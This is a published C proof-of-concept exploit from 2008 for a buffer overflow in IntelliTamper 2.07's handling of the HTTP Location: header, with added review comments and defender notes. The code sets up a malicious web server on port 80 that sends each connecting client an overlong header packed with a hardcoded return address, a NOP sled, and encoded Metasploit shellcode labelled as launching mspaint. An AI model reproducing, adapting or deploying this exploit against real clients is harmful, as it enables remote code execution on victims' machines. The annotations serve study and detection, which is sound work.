IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit

   1   /**
   2    **
   3    ** IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit.
   4    **
   5    ** Based on exploit by Koshi (written in Perl). This one should be more
   6    ** stable. Just for fun and to learn more about win32 exploitation.
   7    **
   8    ** by Wojciech Pawlikowski (wojtekp@gmail.com)
   9    **/
  10
  11   #include <sys/types.h>
  12   #include <sys/socket.h>
  13
  14   #include <arpa/inet.h>
  15   #include <netinet/in.h>
  16
  17   #include   <netdb.h>
  18   #include   <stdio.h>
  19   #include   <stdlib.h>
  20   #include   <string.h>
  21   #include   <unistd.h>
  22
  23   #define BUFSIZE                                                1550   // size of buf in main(); req there is BUFSIZE + 100 and the heap buffer BUFSIZE + 1
  24   #define NOP                                                    0x90   // x86 no-op opcode; main() fills the start of the header value with it
  25   #define RETADDR                                                0x7c941EED   // jmp esp ntdll.dll
       // NOTE(review): RETADDR is a fixed address inside a system DLL. It is only
       // meaningful where that exact ntdll.dll build loads at that exact base;
       // ASLR or a different OS patch level moves it. Which Windows build the
       // author used is not stated on this page.
  26
  27   /* win32_exec -       EXITFUNC=thread CMD=mspaint Size=336 Encoder=Alpha2 http://metasploit.com
        *
        * Generator banner kept as published. Taken at face value it describes a
        * Metasploit-generated Windows payload that runs the command "mspaint",
        * i.e. a visible proof-of-concept marker.
        * NOTE(review): the bytes below are not decoded here, so that description
        * rests on the banner alone - treat the array as untrusted.
        *
        * The listing holds 21 rows of 16 bytes, which agrees with Size=336.
        * main() copies this array into the Location: header value it sends and
        * measures it with strlen().
        */
  28
  29   unsigned char shellcode[] =
  30      "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
  31      "\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
  32      "\x58\x30\x42\x31\x50\x41\x42\x6b\x41\x41\x52\x41\x32\x41\x41\x32"
  33      "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x6d\x39\x59\x6c\x69"
  34      "\x78\x41\x54\x75\x50\x77\x70\x45\x50\x6c\x4b\x73\x75\x55\x6c\x4e"
  35      "\x6b\x61\x6c\x33\x35\x54\x38\x55\x51\x7a\x4f\x4c\x4b\x70\x4f\x45"
  36      "\x48\x4c\x4b\x33\x6f\x67\x50\x45\x51\x4a\x4b\x43\x79\x6c\x4b\x34"
  37      "\x74\x4c\x4b\x47\x71\x6a\x4e\x64\x71\x6f\x30\x5a\x39\x6e\x4c\x4e"
  38      "\x64\x4f\x30\x30\x74\x45\x57\x79\x51\x6b\x7a\x74\x4d\x37\x71\x5a"
  39      "\x62\x4a\x4b\x5a\x54\x55\x6b\x31\x44\x71\x34\x55\x54\x71\x65\x4b"
  40      "\x55\x6c\x4b\x73\x6f\x61\x34\x45\x51\x78\x6b\x65\x36\x6c\x4b\x36"
  41      "\x6c\x50\x4b\x4e\x6b\x71\x4f\x57\x6c\x35\x51\x38\x6b\x4c\x4b\x77"
  42      "\x6c\x6e\x6b\x77\x71\x6a\x4b\x4c\x49\x71\x4c\x37\x54\x34\x44\x7a"
  43      "\x63\x54\x71\x39\x50\x61\x74\x6c\x4b\x43\x70\x46\x50\x4b\x35\x49"
  44      "\x50\x72\x58\x46\x6c\x6c\x4b\x47\x30\x36\x6c\x6c\x4b\x70\x70\x37"
  45      "\x6c\x4e\x4d\x4c\x4b\x65\x38\x46\x68\x7a\x4b\x64\x49\x4e\x6b\x4f"
  46      "\x70\x6e\x50\x77\x70\x77\x70\x45\x50\x6c\x4b\x70\x68\x37\x4c\x63"
  47      "\x6f\x64\x71\x49\x66\x73\x50\x31\x46\x6e\x69\x59\x68\x4b\x33\x69"
  48      "\x50\x51\x6b\x30\x50\x32\x48\x5a\x4f\x5a\x6e\x69\x70\x45\x30\x33"
  49      "\x58\x4c\x58\x6b\x4e\x4c\x4a\x76\x6e\x66\x37\x6b\x4f\x7a\x47\x30"
  50      "\x6d\x53\x43\x62\x50\x53\x51\x73\x59\x32\x4e\x33\x44\x45\x50\x42";
  51
  /*
   * main - proof-of-concept malicious HTTP server for the client-side bug
   * named in the file header.
   *
   * Binds TCP port 80 on every local interface, then loops forever: for each
   * client that connects it reads the request without inspecting it and
   * replies with a response whose Location: header value is a binary blob of
   * roughly BUFSIZE bytes built from RETADDR, NOP bytes and shellcode[].
   * Every connection gets the same reply.
   *
   * Returns: nothing reachable. The while (1) loop has no break, so the
   * close(sockfd) after it never runs; socket(), setsockopt(), bind() and
   * accept() failures call exit().
   *
   * Defender notes: the exposure is in the client that parses this header,
   * so the control is to keep the affected client version away from
   * untrusted servers or retire it. On the wire, a Location value of this
   * length consisting largely of 0x90 bytes is not something a legitimate
   * redirect contains and is a reasonable detection anchor.
   *
   * NOTE(review): the code is left exactly as published. It depends on type
   * sizes and on memory it never initialises, so what it sends is
   * platform-dependent.
   */
  52   int
Wojciech Pawlikowski                                                                                        08/10/2008
                         IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit                     Page 2/3
  53    main(void)
  54    {
  55      struct sockaddr_in serv_sin, cli_sin;
  56      int i, sockfd, cli_sock, sock_opt = 1, sin_len;
          /* buf receives the client's request, req holds the outgoing response;
           * both start zero-filled. overflow is allocated per connection below. */
  57      char *overflow, buf[BUFSIZE] = { 0 }, req[BUFSIZE + 100] = { 0 };
  58
  59      sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  60      if (sockfd < 0)
  61      {
  62        perror("socket()");
  63        exit(−1);
  64      }
  65
          /* Listen address: port 80 on INADDR_ANY. serv_sin is filled field by
           * field and is not zeroed first. */
  66      serv_sin.sin_family = AF_INET;
  67      serv_sin.sin_port = htons(80);
  68      serv_sin.sin_addr.s_addr = INADDR_ANY;
  69
  70      if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &sock_opt, sizeof(int)) < 0)
  71      {
  72        perror("setsockopt()");
  73        close(sockfd);
  74        exit(−1);
  75      }
  76
  77     if (bind(sockfd, (struct sockaddr *)&serv_sin, sizeof(struct sockaddr)) < 0)
  78     {
  79       perror("bind()");
  80       close(sockfd);
  81       exit(−1);
  82     }
  83
         /* Backlog of 1; the return value of listen() is not checked. */
  84     listen(sockfd, 1);
         /* NOTE(review): sin_len is declared int while accept() takes a
          * socklen_t * - confirm the platform tolerates the mismatch. */
  85     sin_len = sizeof(struct sockaddr);
  86
  87     printf("[*] Waiting for a connection...\n");
  88
  89     while (1)
  90     {
  91       cli_sock = accept(sockfd, (struct sockaddr *)&cli_sin, &sin_len);
  92       if (cli_sock < 0)
  93       {
  94         perror("accept()");
  95         exit(−1);
  96       }
  97
  98       printf("[+] Connection from %s:%d\n", inet_ntoa(cli_sin.sin_addr), ntohs(cli_sin.sin_port));
  99
           /* The request is read but neither its contents nor read()'s return
            * value is used. */
  100      read(cli_sock, buf, sizeof(buf) − 1);
           /* New heap buffer on every connection; the result is not checked and
            * the buffer is not freed inside the loop. */
  101      overflow = (char *)malloc(BUFSIZE + 1);
  102
           /* First pass: write RETADDR through a long * at every 4th offset. */
  103      for (i = 0; i <= 1540; i += 4)
  104        *(long *)&overflow[i] = RETADDR;
Wojciech Pawlikowski                                                                                      08/10/2008
                            IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit                                  Page 3/3
  105
                /* Second pass: the first 1536 bytes are overwritten with NOP. */
  106           for (i = 0; i < 1536; i++)
  107             overflow[i] = NOP;
  108
                /* shellcode[] is copied to fixed offset 550; its length comes from
                 * strlen(), i.e. everything up to its first zero byte. */
  109           memcpy(overflow + 550, shellcode, strlen(shellcode));
  110           memcpy(overflow + i + 4, "\xe9\x14\xfc\xff\xff", 5);                           // jmp -1000 - jump to our buffer
  111
                /* The status line is emitted as "200 HTTP/1.1", which is not the
                 * usual order; together with the header length this is a further
                 * network detection anchor. i holds the number of bytes written. */
  112           i = sprintf(req, "200 HTTP/1.1\r\nDate: 2008−07−24 20:14:31\r\nLocation: ");
                /* Header value, then the blank line that ends the headers. Both
                 * lengths come from strlen(overflow), so they depend on where the
                 * first zero byte happens to lie in the heap buffer. */
  113           memcpy(req + i, overflow, strlen(overflow));
  114           memcpy(req + i + strlen(overflow), "\r\n\r\n", 4);
  115
                /* Sent in one write(); its return value is not checked. */
  116           write(cli_sock, req, strlen(req));
  117
  118           printf("[+] Exploit sent!\n");
  119
  120           close(cli_sock);
  121       }
  122
            /* Not reached: the loop above never terminates. */
  123       close(sockfd);
  124   }
  125
  126   // milw0rm.com [2008−08−10]



